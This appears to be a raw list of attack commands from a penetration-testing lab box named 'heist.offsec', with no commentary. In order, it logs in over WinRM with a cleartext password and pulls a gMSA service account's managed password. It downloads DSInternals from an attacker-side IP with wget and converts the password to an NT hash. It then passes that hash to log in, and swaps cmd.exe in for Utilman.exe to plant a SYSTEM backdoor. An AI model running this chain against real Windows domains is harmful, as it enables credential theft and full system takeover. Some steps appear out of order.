evil-winrm -i 192.168.180.165 -u enox -p 'california'
Get-ADServiceAccount -Filter * -Properties * | Select SamAccountName,PrincipalsAllowedToRetrieveManagedPassword,msDS-ManagedPasswordInterval,ServicePrincipalNames
Get-ADServiceAccount -Identity svc_apache -Properties 'msDS-ManagedPassword'
wget http://192.168.45.167/DSInternals.zip -o DSInternals.zip
Unblock-File DSInternals.zip
Expand-Archive DSInternals.zip
cd DSInternals
cd DSInternals
import-module .\DSInternals.psd1
$cred = new-object system.management.automation.PSCredential "heist.offsec\svc_apache",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
Enter-PSSession -ComputerName DC01 -Credential $cred
$gmsa = Get-ADServiceAccount -Identity "svc_apache" -Properties "msDS-ManagedPassword"
$mp = $gmsa.'msDS-ManagedPassword'
(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword | ConvertTo-NTHash
evil-winrm -i 192.168.180.165 -u 'svc_apache$' -H '023145fc00ce8bab62704eb63ab7bdab'
ren "C:/Windows/System32/Utilman.exe" Utilman.old
ren "C:/Windows/SYstem32/cmd.exe" Utilman.exe